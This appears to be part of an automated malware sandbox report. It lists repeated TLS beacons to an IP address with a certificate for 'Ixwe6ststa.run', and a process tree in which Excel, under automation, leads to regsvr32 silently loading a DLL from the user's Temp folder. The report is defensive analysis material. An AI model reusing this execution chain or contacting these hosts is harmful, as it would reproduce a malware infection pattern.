                                                                                                                              Jan 12, 2021 07:44:04.051670074 CET77.220.64.37443192.168.2.2249222CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:06.128902912 CET77.220.64.37443192.168.2.2249226CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:08.250636101 CET77.220.64.37443192.168.2.2249232CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:11.343770981 CET77.220.64.37443192.168.2.2249236CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:13.389673948 CET77.220.64.37443192.168.2.2249240CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:15.452431917 CET77.220.64.37443192.168.2.2249244CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:17.511456013 CET77.220.64.37443192.168.2.2249248CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:19.586059093 CET77.220.64.37443192.168.2.2249252CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:21.677202940 CET77.220.64.37443192.168.2.2249256CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:23.748641968 CET77.220.64.37443192.168.2.2249260CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:25.826719046 CET77.220.64.37443192.168.2.2249264CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:28.880371094 CET77.220.64.37443192.168.2.2249268CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:30.961344957 CET77.220.64.37443192.168.2.2249272CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:33.033416033 CET77.220.64.37443192.168.2.2249276CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:35.080435991 CET77.220.64.37443192.168.2.2249280CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:37.133029938 CET77.220.64.37443192.168.2.2249284CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:39.227730989 CET77.220.64.37443192.168.2.2249288CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:41.335612059 CET77.220.64.37443192.168.2.2249292CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:43.409327030 CET77.220.64.37443192.168.2.2249296CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:45.532656908 CET77.220.64.37443192.168.2.2249300CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:47.638113976 CET77.220.64.37443192.168.2.2249304CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:49.744573116 CET77.220.64.37443192.168.2.2249308CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:51.831463099 CET77.220.64.37443192.168.2.2249312CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:53.924520969 CET77.220.64.37443192.168.2.2249316CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:56.032154083 CET77.220.64.37443192.168.2.2249320CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:58.167417049 CET77.220.64.37443192.168.2.2249324CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:00.228245020 CET77.220.64.37443192.168.2.2249328CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:02.282641888 CET77.220.64.37443192.168.2.2249332CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:04.378952026 CET77.220.64.37443192.168.2.2249336CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:06.525912046 CET77.220.64.37443192.168.2.2249340CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:08.641508102 CET77.220.64.37443192.168.2.2249344CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:10.758306026 CET77.220.64.37443192.168.2.2249348CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:12.865268946 CET77.220.64.37443192.168.2.2249352CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:14.940088987 CET77.220.64.37443192.168.2.2249356CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:17.049262047 CET77.220.64.37443192.168.2.2249360CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:19.138649940 CET77.220.64.37443192.168.2.2249364CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:21.244668961 CET77.220.64.37443192.168.2.2249368CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:23.379292965 CET77.220.64.37443192.168.2.2249372CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:25.655993938 CET77.220.64.37443192.168.2.2249376CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:27.717139959 CET77.220.64.37443192.168.2.2249380CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:30.254415989 CET77.220.64.37443192.168.2.2249384CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:32.367144108 CET77.220.64.37443192.168.2.2249388CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:34.489134073 CET77.220.64.37443192.168.2.2249392CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:36.308809996 CET77.220.64.37443192.168.2.2249396CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:38.451756001 CET77.220.64.37443192.168.2.2249400CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:40.549096107 CET77.220.64.37443192.168.2.2249404CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:45:42.692789078 CET77.220.64.37443192.168.2.2249408CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:07:42:41
                                                                                                                              Start date:12/01/2021
                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                              Imagebase:0x13fd70000
                                                                                                                              File size:27641504 bytes
                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:07:42:49
                                                                                                                              Start date:12/01/2021
                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
                                                                                                                              Imagebase:0xff510000
                                                                                                                              File size:19456 bytes
                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:07:42:49
                                                                                                                              Start date:12/01/2021
                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline: -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
                                                                                                                              Imagebase:0x210000
                                                                                                                              File size:14848 bytes
                                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:07:43:07
                                                                                                                              Start date:12/01/2021
                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456
                                                                                                                              Imagebase:0x13f4d0000
                                                                                                                              File size:995024 bytes
                                                                                                                              MD5 hash:45A078B2967E0797360A2D4434C41DB4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:07:43:08
                                                                                                                              Start date:12/01/2021
                                                                                                                              Path:C:\Windows\System32\DWWIN.EXE
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\dwwin.exe -x -s 2456
                                                                                                                              Imagebase:0xff3f0000
                                                                                                                              File size:152576 bytes
                                                                                                                              MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Reset < >